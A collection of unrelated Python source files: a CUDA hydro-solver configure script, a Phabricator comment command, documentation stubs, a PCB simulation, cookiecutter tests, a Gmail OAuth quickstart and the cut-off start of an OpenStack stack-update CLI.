                'nscalars': (int, 0),
                'gamma': (float, 1.4),
                'cfl': (float, .2),
                'x1_min': (float, 0.),
                'x1_max': (float, 1.),
                'x2_min': (float, 0.),
                'x2_max': (float, 1.),
                'x3_min': (float, 0.),
                'x3_max': (float, 1.),
                'tend': (float, 1.),
                'nout0d': (int, -1),
                'nout1d': (int, -1),
                'nout2d': (int, -1),
                'nout3d': (int, -1),
                'maxsteps': (int, "1e64"),
                'outputdir': (str, 'out/'),
                'outputname': (str, 'fld')}


def default_lines():
    """Build the C source of default_pars(), which fills a Parameters struct
    with the defaults declared in the `default_pars` table above."""
    parts = ["void default_pars(Parameters *params) {\n"]
    for name, (ctype, default) in default_pars.items():
        if name == 'maxsteps':
            # maxsteps is stored as long long in C; cast its default explicitly.
            parts.append(" params->{} = (long long int){};\n".format(name, default))
        elif ctype is not str:
            parts.append(" params->{} = {};\n".format(name, default))
        else:
            parts.append(' strcpy(params->{},"{}");\n'.format(name, default))
    parts.append('\n}\n')
    return ''.join(parts)
def determine_type(val):
    """Infer the Python type of a parameter-file value string.

    'yes'/'no' (any case) map to bool; otherwise the type of whatever
    `ast.literal_eval` parses; anything unparseable is treated as a string.

    Fix: malformed literals such as 'foo bar' make `ast.literal_eval` raise
    SyntaxError, not ValueError, which previously escaped this function and
    crashed the caller.
    """
    import ast
    if val.lower() == 'no' or val.lower() == 'yes':
        return bool
    try:
        return type(ast.literal_eval(val))
    except (ValueError, SyntaxError):
        return str
def load_par_file(fname):
    """Parse a parameter file into [[lowercased_name, value_string], ...].

    Comment lines (starting '#'), blank lines and lines without '=' are
    skipped; only the first '='-separated field after the name is kept.
    """
    entries = []
    with open(fname, 'r') as fh:
        for raw in fh.readlines():
            if raw[0] == '#' or len(raw.strip()) == 0 or '=' not in raw:
                continue
            fields = [part.strip() for part in raw.split('=')]
            entries.append([fields[0].lower(), fields[1]])
    return entries
def read_defs_file(fname):
    """Return the stripped '#define' lines from a problem defs header.

    A line qualifies only if it contains '#define', begins with '#', and is
    non-blank — this skips commented-out defines like '// #define X'.
    """
    with open(fname, 'r') as fh:
        raw_lines = fh.readlines()
    return [ln.strip() for ln in raw_lines
            if '#define' in ln and ln.startswith('#') and len(ln.strip()) > 0]
def create_int_block(key,first=False):
    """Emit the C strcmp-dispatch branch that assigns an integer parameter.

    `first` selects 'if' vs 'else if' so the generated chain is valid C.
    'maxsteps' is special-cased: it is stored as long long and taken from the
    parsed double value so inputs like '1e64' survive the round trip.
    """
    if key == 'maxsteps':
        if first:
            out = r""" if"""
        else:
            out = r""" else if"""
        out += """ (strcmp(name,"{}")==0) """.format(key)
        out += """ { params->""" + key + """= (long long int)double_val; PRINT_DOUBLE(name,double_val); }
"""
        return out
    if first:
        out = r""" if"""
    else:
        out = r""" else if"""
    out += """ (strcmp(name,"{}")==0) """.format(key)
    out += """ { params->""" + key + """= int_val; PRINT_INT(name,int_val); }
"""
    return out
def create_float_block(key,first=False):
    """Emit the C strcmp-dispatch branch that assigns a floating-point
    parameter from the parsed double value; `first` selects 'if' vs 'else if'."""
    if first:
        out = r""" if"""
    else:
        out = r""" else if"""
    out += """ (strcmp(name,"{}")==0) """.format(key)
    out += """ { params->""" + key + """= double_val; PRINT_DOUBLE(name,double_val); }
"""
    return out
def create_bool_block(key,first=False):
    """Emit the C strcmp-dispatch branch that assigns a boolean parameter from
    the yes/no-derived bool value; `first` selects 'if' vs 'else if'."""
    if first:
        out = r""" if"""
    else:
        out = r""" else if"""
    out += """ (strcmp(name,"{}")==0) """.format(key)
    out += """ { params->""" + key + """= bool_val; PRINT_STR(name,str_val); }
"""
    return out
def create_string_block(key,first=False):
    """Emit the C strcmp-dispatch branch that copies a string parameter into
    the struct via sprintf; `first` selects 'if' vs 'else if'."""
    if first:
        out = r""" if"""
    else:
        out = r""" else if"""
    out += """ (strcmp(name,"{}")==0) """.format(key)
    out += """ { sprintf(params->""" + key + ""","%s",str_val); PRINT_STR(name,str_val); }
"""
    return out
def create_par_file(lines,fname):
    """Generate the C source (written to `fname`, normally src/read_pars.c)
    that parses parameter files and command-line overrides into a Parameters
    struct: a set_var() dispatcher, parse_argument(), read_param_file(), and
    the default_pars() initialiser from default_lines().

    `lines` is the [[name, value], ...] output of load_par_file().
    """
    output = r"""#include "defs.h"
#include <ctype.h>

#define PRINT_DOUBLE(NAME,VAL) printf("\t%s = %lg\n",NAME,VAL)
#define PRINT_INT(NAME,VAL) printf("\t%s = %d\n",NAME,VAL)
#define PRINT_STR(NAME,VAL) printf("\t%s = %s\n",NAME,VAL)
#define FPRINT_DOUBLE(F,NAME,VAL) fprintf(f,"%s = %lg\n",NAME,VAL)
#define FPRINT_INT(F,NAME,VAL) fprintf(f,"%s = %d\n",NAME,VAL)
#define FPRINT_STR(F,NAME,VAL) fprintf(f,"%s = %s\n",NAME,VAL)

void set_var(char *name,int int_val, double double_val, int bool_val, char *str_val, Parameters *params) {
"""
    int_blocks =[]
    bool_blocks=[]
    float_blocks=[]
    str_blocks = []
    # First pass: one dispatch branch per built-in default parameter.
    # NOTE(review): 'first' is only ever set True for int blocks, so the other
    # type groups always start with 'else if' — valid C only because the int
    # branches are emitted first; an input with no int params would generate
    # a dangling 'else if'. Confirm whether that case can occur.
    for i,line in enumerate(default_pars.items()):
        key,val = line
        t,default = val
        key = key.lower()
        kargs = {'first': False}
        if t is int:
            kargs['first'] = len(int_blocks) == 0
            int_blocks.append(create_int_block(key,**kargs))
        elif t is bool:
            bool_blocks.append(create_bool_block(key,**kargs))
        elif t is float:
            float_blocks.append(create_float_block(key,**kargs))
        elif t is str:
            str_blocks.append(create_string_block(key,**kargs))
        else:
            print('{} has no type! Given type '.format(key),t)
    # Second pass: problem-specific parameters from the .par file that are
    # not already covered by the defaults; their type is inferred.
    for i,line in enumerate(lines):
        key,val = line
        key = key.lower()
        print(line, key, val)
        if key not in default_pars:
            key = key.lower()
            t = determine_type(val)
            kargs = {'first': False}
            if t is int:
                kargs['first'] = len(int_blocks) == 0
                int_blocks.append(create_int_block(key,**kargs))
            elif t is bool:
                bool_blocks.append(create_bool_block(key,**kargs))
            elif t is float:
                float_blocks.append(create_float_block(key,**kargs))
            elif t is str:
                str_blocks.append(create_string_block(key,**kargs))
            else:
                print('{} has no type! Given type '.format(key),t)
    # Emit the branches grouped by type: ints first (they carry the 'if').
    output += '\n'.join(int_blocks)
    output += '\n'.join(float_blocks)
    output += '\n'.join(bool_blocks)
    output += '\n'.join(str_blocks)
    output += '\nreturn;\n}\n'
    # Fixed C scaffolding: command-line override parser and par-file reader.
    output += r"""
void parse_argument(int argc, char *argv[], Parameters *params) {
    int j;
    unsigned int i;
    char name[100],strval[100];
    double dval;
    int ival;
    int bool_val;
    char testbool;

    for(j=0;j<argc;j++) {
        sscanf(argv[j],"%32[^=]=%s",name,strval);
        dval = atof(strval);
        ival = atoi(strval);
        testbool = toupper(strval[0]);
        if (testbool == 'Y') bool_val = TRUE;
        else bool_val = FALSE;
        for (i = 0; i<strlen(name); i++) name[i] = (char)tolower(name[i]);
        set_var(name,ival,dval,bool_val,strval,params);
    }
    return;
}

void read_param_file(char *fname, int argc, char *argv[], Parameters *params) {
    FILE *f;
    char tok[20] = "\t :=>";
    char line[100],name[100],strval[100];
    char *data;
    double temp;
    int status;
    int int_val;
    int bool_val;
    char testbool;
    unsigned int i;

    f= fopen(fname,"r");

    while (fgets(line,100,f)) {
        status = sscanf(line,"%s",name);
        if (name[0] != '#' && status == 1) {
            data = line + (int)strlen(name);
            sscanf(data + strspn(data,tok),"%lf",&temp);
            sscanf(data + strspn(data,tok),"%s",strval);
            int_val = (int)temp;
            testbool = toupper(strval[0]);
            if (testbool == 'Y') bool_val = TRUE;
            else bool_val = FALSE;
            for (i = 0; i<strlen(name); i++) name[i] = (char)tolower(name[i]);
            set_var(name,int_val,temp,bool_val,strval,params);
        }
    }
    if (argc > 0) {
        printf("Redefined on the command line:\n");
        parse_argument(argc,argv,params);
    }
    return;
}
"""
    output += default_lines()
    with open(fname,'w') as f:
        f.write(output)
def create_struct(lines):
    """Return the C header lines declaring the Parameters struct (one field
    per default and per problem-specific parameter) plus the prototypes for
    read_param_file() and default_pars().

    `lines` is the [[name, value], ...] output of load_par_file().
    """
    out_lines = ['#ifdef ISFLOAT\n#define real float\n#else\n#define real double\n#endif\n',
                 'typedef struct Parameters {']
    # Fields for the built-in defaults.
    for key,val in default_pars.items():
        key = key.lower()
        t,default = val
        if t is int or t is bool:
            if key == 'maxsteps':
                # maxsteps can exceed int range (e.g. 1e64 input), so long long.
                out_lines.append('\tlong long int {};'.format(key))
            else:
                out_lines.append('\tint {};'.format(key))
        elif t is float:
            out_lines.append('\treal {};'.format(key))
        elif t is str:
            out_lines.append('\tchar {}[512];'.format(key))
        else:
            print('{} has no type! Given type '.format(key),t)
    # Fields for problem-specific parameters (types inferred from the values).
    for line in lines:
        key,val = line
        if key not in default_pars:
            key = key.lower()
            t = determine_type(val)
            if t is int or t is bool:
                out_lines.append('\tint {};'.format(key))
            elif t is float:
                out_lines.append('\treal {};'.format(key))
            elif t is str:
                out_lines.append('\tchar {}[512];'.format(key))
            else:
                print('{} has no type! Given type '.format(key),t)
    out_lines.append('} Parameters;\n');
    out_lines.append('void read_param_file(char *fname, int argc, char *argv[], Parameters *params);\n')
    out_lines.append('void default_pars(Parameters *params);\n')
    return out_lines
def add_extra_def(name, args, defs_lines, extra_defs, defname=None):
    """Append '#define <NAME>' (or '#define <defname>') to `extra_defs` when
    the CLI flag `name` is set in `args` and no existing defs line already
    mentions it (substring match against each line's second token)."""
    if not args[name.lower()]:
        return
    flag = name.lower()
    already_defined = any(flag in line.split()[1].lower() for line in defs_lines)
    if not already_defined:
        token = name.upper() if defname is None else defname
        extra_defs.append('#define {}'.format(token))
if __name__ == "__main__":
    """
    Pass the directory containing the initialization file,
    parameter file, and problem defs.

    Example for implosion test located in
    src/tests/2D/imp/

    src/tests/2D/imp/imp.cu --> init file
    src/tests/2D/imp/imp.par --> parameters
    src/tests/2D/imp/imp.h --> problem defs

    Configure and compile this test using,

    ./configure -prob src/tests/2D/imp
    make
    """
    import argparse
    import shutil
    from subprocess import call
    parser = argparse.ArgumentParser()
    parser.add_argument('-prob',type=str,default='src/tests/2D/imp',help='Problem directory')
    parser.add_argument('--prof',action='store_true',help='Enabling profiling. No outputs will be written.')
    parser.add_argument('--silent',action='store_true',help='Silences all output to stdout.')
    parser.add_argument('--pcm',action='store_true',help='Piecewise constant reconstruction.')
    parser.add_argument('--plm',action='store_true',help='Piecewise linear reconstruction.')
    parser.add_argument('--ppm',action='store_true',help='Piecewise parabolic reconstruction.')
    parser.add_argument('--ctu',action='store_true',help='Use CTU algorithm.')
    parser.add_argument('--de',action='store_true',help='Use the Dual Energy approximation.')
    parser.add_argument('-detol',type=float,default=1e-2,help='tolerance for discrepency between internal and kinetic energies. Requires --de flag ')
    parser.add_argument('--conduction',action='store_true',help='Enable heat conduction.')
    parser.add_argument('--viscosity',action='store_true',help='Enable viscosity.')
    parser.add_argument('--potential',action='store_true',help='Enable static gravitational potential.')
    parser.add_argument('--hll',action='store_true',help='Use HLL Riemann solver.')
    parser.add_argument('--hllc',action='store_true',help='Use HLLC Riemann solver.')
    parser.add_argument('--exact',action='store_true',help='Use exact Riemann solver.')
    parser.add_argument('--float',action='store_true',help='Use floats instead of doubles.')
    parser.add_argument('--dims1',action='store_true',help='1D problem.')
    parser.add_argument('--dims2',action='store_true',help='2D problem.')
    parser.add_argument('--dims3',action='store_true',help='3D problem.')
    args = vars(parser.parse_args())
    # Locate the problem's .par/.h/.cu files from the directory name.
    directory = args['prob']
    if directory[-1] != '/':
        directory += '/'
    problem_name = directory.split('/')[-2]
    parfile = directory + problem_name + '.par'
    defsfile = directory + problem_name + '.h'
    initfile = directory + problem_name + '.cu'
    defs_lines = read_defs_file(defsfile)
    extra_defs = []
    # Number of dims: mutually exclusive flags; CLI overrides the defs file.
    dims1 = int(args['dims1'])
    dims2 = int(args['dims2'])
    dims3 = int(args['dims3'])
    rsum = dims1 + dims2 + dims3
    if rsum > 0:
        if rsum > 1:
            print('Can only have one of dims1, dims2, dims3 defined!')
            exit()
        else:
            # Drop any pre-existing DIMS define; the CLI flag takes precedence.
            defs_lines = list(filter(lambda x: not any([c in x.lower() for c in ['dims1','dims2','dims3']]), defs_lines))
            if dims1:
                extra_defs.append('#define DIMS1')
            if dims2:
                extra_defs.append('#define DIMS2')
            if dims3:
                extra_defs.append('#define DIMS3')
    # Riemann solver: mutually exclusive flags; CLI overrides the defs file.
    hll = int(args['hll'])
    hllc = int(args['hllc'])
    exact = int(args['exact'])
    rsum = hll + hllc + exact
    if rsum > 0:
        if rsum > 1:
            print('Can only have one of HLL, HLLC, EXACT defined!')
            exit()
        else:
            # Drop any pre-existing Riemann-solver define.
            defs_lines = list(filter(lambda x: not any([c in x.lower() for c in ['hll','hllc','exact']]), defs_lines))
            if hll:
                extra_defs.append('#define HLL')
            if hllc:
                extra_defs.append('#define HLLC')
            if exact:
                extra_defs.append('#define EXACT')
    # Reconstruction: mutually exclusive flags; CLI overrides the defs file.
    pcm = int(args['pcm'])
    plm = int(args['plm'])
    ppm = int(args['ppm'])
    rsum = pcm + plm + ppm
    if rsum > 0:
        if rsum > 1:
            print('Can only have one of PCM, PLM, PPM defined!')
            exit()
        else:
            # Drop any pre-existing reconstruction define.
            defs_lines = list(filter(lambda x: not any([c in x.lower() for c in ['pcm','plm','ppm']]), defs_lines))
            if pcm:
                extra_defs.append('#define PCM')
            if plm:
                extra_defs.append('#define PLM')
            if ppm:
                extra_defs.append('#define PPM')
    # Simple on/off physics and build options.
    add_extra_def('viscosity',args,defs_lines,extra_defs)
    add_extra_def('conduction',args,defs_lines,extra_defs)
    add_extra_def('potential',args,defs_lines,extra_defs)
    add_extra_def('ctu',args,defs_lines,extra_defs)
    add_extra_def('prof',args,defs_lines,extra_defs)
    add_extra_def('silent',args,defs_lines,extra_defs)
    add_extra_def('float',args,defs_lines,extra_defs,defname='ISFLOAT')
    add_extra_def('de',args,defs_lines,extra_defs,defname='DUAL_ENERGY')
    if args['de']:
        extra_defs.append("#define DETOL {:.3e}".format(args['detol']))
    # Write outputs: problem sources into src/, generated parser, and a
    # tarball snapshot of the configured source tree.
    shutil.copy(defsfile,'src/prob.h')
    shutil.copy(initfile,'src/prob.cu')
    lines = load_par_file(parfile)
    create_par_file(lines,'src/read_pars.c')
    struct_lines = create_struct(lines)
    with open('src/prob.h','w') as f:
        f.write('\n'.join(defs_lines + extra_defs) + '\n\n')
        f.write('\n'.join(struct_lines) + '\n')
    call(['tar','-czf','{}_src.tar.gz'.format(problem_name),'src/'])
|
"""create a comment on differential reviews.
usage examples:
comment on revision '1':
$ arcyon comment 1 -m 'hello revision 1, how are you?'
accept revision '1':
$ arcyon comment 1 -m 'looks good' --action accept
comment on revisions 1 and 2, reading the message from 'mymessage':
$ arcyon comment 1 2 --message-file mymessage
"""
# =============================================================================
# CONTENTS
# -----------------------------------------------------------------------------
# aoncmd_comment
#
# Public Functions:
# getFromfilePrefixChars
# setupParser
# process
#
# -----------------------------------------------------------------------------
# (this contents block is generated, edits will be lost)
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
import textwrap
import phlcon_differential
import phlsys_makeconduit
def getFromfilePrefixChars():
    """Prefix characters for argparse @-file support: none are used here."""
    return ""
def setupParser(parser):
    """Register the arcyon-comment command-line arguments on *parser*."""
    # Group the action-related options so --help shows the valid actions.
    actions = parser.add_argument_group(
        'action arguments',
        'use any of ' + textwrap.fill(
            str(phlcon_differential.USER_ACTIONS.keys())))
    # Revision ids may come from the command line, --ids-file, or both.
    parser.add_argument(
        'ids',
        type=int,
        nargs="*",
        default=[],
        help="the revisions to comment on (e.g. 1)")
    parser.add_argument(
        '--ids-file',
        metavar='FILE',
        type=argparse.FileType('r'),
        help="a file to read ids from, use '-' to specify stdin")
    # The message may likewise come from -m, --message-file, or both;
    # process() concatenates them.
    parser.add_argument(
        '--message', '-m',
        metavar="M",
        default="",
        type=str,
        help="the body text of the comment")
    parser.add_argument(
        '--message-file',
        metavar='FILE',
        type=argparse.FileType('r'),
        help="a file to read the message from, use '-' for stdin")
    parser.add_argument(
        '--silent',
        action='store_true',
        help="don't send notification emails for this comment")
    parser.add_argument(
        '--attach-inlines',
        action='store_true',
        help="attach pending inline comments")
    actions.add_argument(
        '--action', '-a',
        choices=phlcon_differential.USER_ACTIONS.keys(),
        metavar="ACTION",
        default='comment',
        type=str,
        help="perform an action on a review")
    # Adds the conduit connection options (--uri, --user, --cert, ...).
    phlsys_makeconduit.add_argparse_arguments(parser)
def process(args):
    """Create a comment (and optionally perform an action) on each revision.

    Exits with status 1 when no revision ids were supplied on the command
    line or via --ids-file.
    """
    conduit = phlsys_makeconduit.make_conduit(
        args.uri, args.user, args.cert, args.act_as_user)
    d = {
        'message': args.message,
        'silent': args.silent,
        'action': phlcon_differential.USER_ACTIONS[args.action],
        'attach_inlines': args.attach_inlines
    }
    if args.message_file:
        d['message'] += args.message_file.read()
    # BUG FIX: copy the list -- the original aliased args.ids and then
    # extended it in place, mutating the parsed-arguments namespace.
    ids = list(args.ids)
    if args.ids_file:
        ids.extend(int(i) for i in args.ids_file.read().split())
    if not ids:
        print("error: you have not specified any revision ids")
        sys.exit(1)
    for i in ids:
        phlcon_differential.create_comment(conduit, i, **d)
# -----------------------------------------------------------------------------
# Copyright (C) 2013-2014 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
|
def section1():
    """
    # Upload & Manage Data & Metadata
    ## Upload specific files
    When you have specific files you want to upload, you can upload them all into a dataset using this script:
    """
    # Docs-generation stub: the markdown docstring above is extracted
    # verbatim into the documentation; the body is intentionally empty.
def section2():
    """
    ## Upload all files in a folder
    If you want to upload all files from a folder, you can do that by just specifying the folder name:
    """
    # Docs-generation stub: the markdown docstring above is extracted
    # verbatim into the documentation; the body is intentionally empty.
def section3():
    """
    ## Upload items from URL link
    You can provide Dataloop with the link to the item, and not necessarily the item itself.
    """
    # Docs-generation stub: the markdown docstring above is extracted
    # verbatim into the documentation; the body is intentionally empty.
def section4():
    """
    You can open an item uploaded to Dataloop by opening it in a viewer.
    """
    # Docs-generation stub: the markdown docstring above is extracted
    # verbatim into the documentation; the body is intentionally empty.
def section5():
    """
    ### Additional upload options
    Additional upload options include using buffer, pillow, openCV, and NdArray - see our complete documentation for code examples.
    ## Upload Items and Annotations Metadata
    You can upload items as a table using a pandas data frame that will let you upload items with info (annotations, metadata such as confidence, filename, etc.) attached to it.
    """
    # Docs-generation stub: the markdown docstring above is extracted
    # verbatim into the documentation; the body is intentionally empty.
|
# First way: import the module, then call through it.
# import myfunc
# myfunc.hello()

# Second way: import the function directly.
from myfunc import hello

# BUG FIX: the bare expression `hello` only referenced the function object
# and did nothing; it must be called to run it.
hello()

# third way - import dir into path
# /Users/mohalloran/Documents/Python_For_NetENG_with_KirkB/PROGRAMS/week2/test
|
#!/usr/bin/env python
from typing import List
import numpy as np
from pyems.pcb import common_pcbs
from pyems.simulation import Simulation
from pyems.utilities import print_table
from pyems.structure import (
PCB,
Microstrip,
common_smd_passives,
SMDPassive,
)
from pyems.coordinate import Box2, Coordinate2, Axis
from pyems.mesh import Mesh
from pyems.calc import minimize
# Base length unit for all dimensions below: 1 mm.
unit = 1e-3
# Frequency sweep: 1 GHz to 18 GHz in 10 MHz steps.
freq = np.arange(1e9, 18e9, 1e7)
pcb_prop = common_pcbs["oshpark4"]
pcb_len = 10
pcb_width = 5
trace_width = 0.38
z0_ref = 50  # reference impedance (ohm) for both ports
cap_dim = common_smd_passives["0402C"]
# cap_dim = common_smd_passives["0201C"]
cap_dim.set_unit(unit)
# Square pads sized from the capacitor body width.
pad_length = cap_dim.width
pad_width = cap_dim.width
def func(params: List[float]):
    """Build and run one S-parameter simulation for a given ground-cutout
    width; return np.sum(S11) over the sweep (the cost minimize() drives
    down).

    :param params: single-element list; params[0] is the ground cutout
        width beneath the series capacitor.
    """
    cutout_width = params[0]
    sim = Simulation(freq=freq, unit=unit, sim_dir=None)
    pcb = PCB(
        sim=sim,
        pcb_prop=pcb_prop,
        length=pcb_len,
        width=pcb_width,
        layers=range(3),
        omit_copper=[0],
    )
    # Feed microstrip: left PCB edge up to the first capacitor pad.
    box = Box2(
        Coordinate2(-pcb_len / 2, -trace_width / 2),
        Coordinate2(-(cap_dim.length / 2) - (pad_length / 2), trace_width / 2),
    )
    Microstrip(
        pcb=pcb,
        position=box.center(),
        length=box.length(),
        width=box.width(),
        propagation_axis=Axis("x"),
        trace_layer=0,
        gnd_layer=1,
        port_number=1,
        excite=True,
        feed_shift=0.35,
        ref_impedance=z0_ref,
    )
    # Series capacitor at board center, with the cutout width under test.
    SMDPassive(
        pcb=pcb,
        position=Coordinate2(0, 0),
        axis=Axis("x"),
        dimensions=cap_dim,
        pad_width=pad_width,
        pad_length=pad_length,
        c=10e-12,
        pcb_layer=0,
        gnd_cutout_width=cutout_width,
        gnd_cutout_length=1,
    )
    # Output microstrip: right capacitor pad to the right PCB edge.
    box = Box2(
        Coordinate2(pcb_len / 2, trace_width / 2),
        Coordinate2((cap_dim.length / 2) + (pad_length / 2), -trace_width / 2),
    )
    Microstrip(
        pcb=pcb,
        position=box.center(),
        length=box.length(),
        width=box.width(),
        propagation_axis=Axis("x", direction=-1),
        trace_layer=0,
        gnd_layer=1,
        port_number=2,
        excite=False,
        ref_impedance=z0_ref,
    )
    Mesh(
        sim=sim,
        metal_res=1 / 120,
        nonmetal_res=1 / 40,
        smooth=(1.2, 1.2, 1.2),
        min_lines=5,
        expand_bounds=((0, 0), (0, 0), (10, 20)),
    )
    sim.run(csx=False)
    print_table(
        data=[sim.freq / 1e9, sim.s_param(1, 1), sim.s_param(2, 1)],
        col_names=["freq", "s11", "s21"],
        prec=[4, 4, 4],
    )
    return np.sum(sim.s_param(1, 1))
# Optimize the ground-cutout width to minimize total |S11| over the band.
res = minimize(func=func, initial=[1.2], tol=1e-2, bounds=[(0, None)])
print(res)
|
import os
from pathlib import Path
from subprocess import run, PIPE
import pytest
from conftest import bake_project, config_generator
def no_curlies(filepath):
    """Return True when the file contains no Jinja template markers.

    That is, was jinja able to render everything?

    :param filepath: pathlib.Path of the rendered file to inspect.
    """
    # BUG FIX: the original called filepath.open('r').read(), leaking the
    # file handle; read_text() opens and closes the file for us.
    data = filepath.read_text()
    template_strings = [
        '{{',
        '}}',
        '{%',
        '%}'
    ]
    return not any(s in data for s in template_strings)
@pytest.mark.parametrize("config", config_generator())
def test_baking_configs(config):
    """ For every generated config in the config_generator, run all
    of the tests.
    """
    print("using config", config)
    # Bake a fresh project for this config, then run every verifier on it.
    with bake_project(config) as project_directory:
        verify_folders(project_directory, config)
        verify_files(project_directory, config)
        verify_makefile_commands(project_directory, config)
def verify_folders(root, config):
    ''' Tests that expected folders and only expected folders exist.
    '''
    expected_dirs = [
        '.',
        'data',
        'data/external',
        'data/interim',
        'data/processed',
        'data/raw',
        'docs',
        'models',
        'notebooks',
        'references',
        'reports',
        'reports/figures',
        config['module_name'],
        f"{config['module_name']}/data",
        f"{config['module_name']}/features",
        f"{config['module_name']}/models",
        f"{config['module_name']}/visualization",
    ]
    expected_dirs = [
        # (root / d).resolve().relative_to(root) for d in expected_dirs
        Path(d) for d in expected_dirs
    ]
    # Every directory under root, relative to root ('.' is root itself).
    existing_dirs = [
        d.resolve().relative_to(root) for d in root.glob('**') if d.is_dir()
    ]
    # Exact match: nothing missing and nothing extra.
    assert sorted(existing_dirs) == sorted(expected_dirs)
def verify_files(root, config):
    ''' Test that expected files and only expected files exist.
    '''
    expected_files = [
        'Makefile',
        'README.md',
        'setup.py',
        ".env",
        ".gitignore",
        "data/external/.gitkeep",
        "data/interim/.gitkeep",
        "data/processed/.gitkeep",
        "data/raw/.gitkeep",
        "docs/Makefile",
        "docs/commands.rst",
        "docs/conf.py",
        "docs/getting-started.rst",
        "docs/index.rst",
        "docs/make.bat",
        "notebooks/.gitkeep",
        "references/.gitkeep",
        "reports/.gitkeep",
        "reports/figures/.gitkeep",
        "models/.gitkeep",
        f"{config['module_name']}/__init__.py",
        f"{config['module_name']}/data/__init__.py",
        f"{config['module_name']}/data/make_dataset.py",
        f"{config['module_name']}/features/__init__.py",
        f"{config['module_name']}/features/build_features.py",
        f"{config['module_name']}/models/__init__.py",
        f"{config['module_name']}/models/train_model.py",
        f"{config['module_name']}/models/predict_model.py",
        f"{config['module_name']}/visualization/__init__.py",
        f"{config['module_name']}/visualization/visualize.py",
    ]
    # conditional files
    if not config["open_source_license"].startswith("No license"):
        expected_files.append('LICENSE')
    expected_files.append(config["dependency_file"])
    expected_files = [
        Path(f) for f in expected_files
    ]
    existing_files = [
        f.relative_to(root) for f in root.glob('**/*') if f.is_file()
    ]
    # Exact match first, then confirm every file rendered completely.
    assert sorted(existing_files) == sorted(expected_files)
    for f in existing_files:
        assert no_curlies(root / f)
def verify_makefile_commands(root, config):
    """ Actually shell out to bash and run the make commands for:
    - create_environment
    - requirements
    Ensure that these use the proper environment.
    """
    test_path = Path(__file__).parent
    # Pick the harness script matching the configured environment manager.
    if config["environment_manager"] == 'conda':
        harness_path = test_path / "conda_harness.sh"
    elif config["environment_manager"] == 'virtualenv':
        harness_path = test_path / "virtualenv_harness.sh"
    elif config["environment_manager"] == 'pipenv':
        harness_path = test_path / "pipenv_harness.sh"
    elif config["environment_manager"] == 'none':
        # Nothing to verify when no environment manager was requested.
        return True
    else:
        raise ValueError(f"Environment manager '{config['environment_manager']}' not found in test harnesses.")
    result = run(["bash", str(harness_path), str(root.resolve())], stderr=PIPE, stdout=PIPE)
    # normally hidden by pytest except in failure we want this displayed
    print("\n======================= STDOUT ======================")
    print(result.stdout.decode())
    print("\n======================= STDERR ======================")
    print(result.stderr.decode())
    assert result.returncode == 0
|
"""
Original: Shelley Pham
New Author: Shubham Naik
"""
from __future__ import print_function
import httplib2
import os
import re
import time
import base64
from apiclient import discovery
from apiclient import errors
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# Full-access Gmail OAuth scope.
SCOPES = 'https://mail.google.com/'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Gmail API Python Quickstart'
# oauth2client's tools.run_flow expects parsed CLI flags; fall back to
# None when argparse is unavailable (very old interpreters).
try:
    import argparse
    flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
    flags = None
def get_credentials():
    """Return valid Gmail API user credentials.

    Loads cached credentials from
    ~/.credentials/gmail-python-quickstart.json; when absent or invalid,
    runs the OAuth2 flow interactively and stores the result there.
    """
    home_dir = os.path.expanduser('~')
    credential_dir = os.path.join(home_dir, '.credentials')
    if not os.path.exists(credential_dir):
        os.makedirs(credential_dir)
    credential_path = os.path.join(credential_dir,
                                   'gmail-python-quickstart.json')
    store = Storage(credential_path)
    credentials = store.get()
    if not credentials or credentials.invalid:
        flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
        flow.user_agent = APPLICATION_NAME
        if flags:
            credentials = tools.run_flow(flow, store, flags)
        else:  # Needed only for compatibility with Python 2.6
            credentials = tools.run(flow, store)
        print('Storing credentials to ' + credential_path)
    return credentials
def main():
    """Obtain (and cache) Gmail API credentials for the current user."""
    get_credentials()


if __name__ == '__main__':
    main()
|
# Copyright 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import logging
import textwrap
from os_cloud_management.cmd.utils import _clients as clients
from os_cloud_management.cmd.utils import environment
from os_cloud_management import updates
def parse_args():
    """Build and run the argument parser for the stack-update command.

    main() expects exactly one of --stack (start a new update) or
    --continue (resume an existing one).
    """
    description = textwrap.dedent("""
        Run stack update.
    """)
    parser = argparse.ArgumentParser(
        description=description,
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    parser.add_argument('-s', '--stack', dest='orig_stack',
                        help='Name or ID of a stack to update')
    parser.add_argument('-c', '--continue', dest='update_stack',
                        help='Name or ID of a stack representing an '
                             'existing update')
    parser.add_argument('-t', '--template', dest='template',
                        help='A template containing UpdateConfig to be '
                             'used for update')
    parser.add_argument('-n', '--name', dest='update_name',
                        help='Name for the update stack')
    parser.add_argument('-i', '--interactive', dest='interactive',
                        action='store_true',
                        help='Run update process in interactive mode')
    # Shared -v/--debug style logging options.
    environment._add_logging_arguments(parser)
    return parser.parse_args()
def main():
    """Entry point: start, continue, or report on a heat stack update.

    Returns 0 on success and 1 on any unexpected error.
    """
    args = parse_args()
    environment._configure_logging(args)
    try:
        environment._ensure()
        client = clients.get_heat_client()
        if args.orig_stack:
            update = updates.UpdateManager(client=client)
            update.start(args.orig_stack, args.template, args.update_name)
        elif args.update_stack:
            update = updates.UpdateManager(client=client,
                                           stack_id=args.update_stack)
            if args.interactive:
                update.do_interactive_update()
            else:
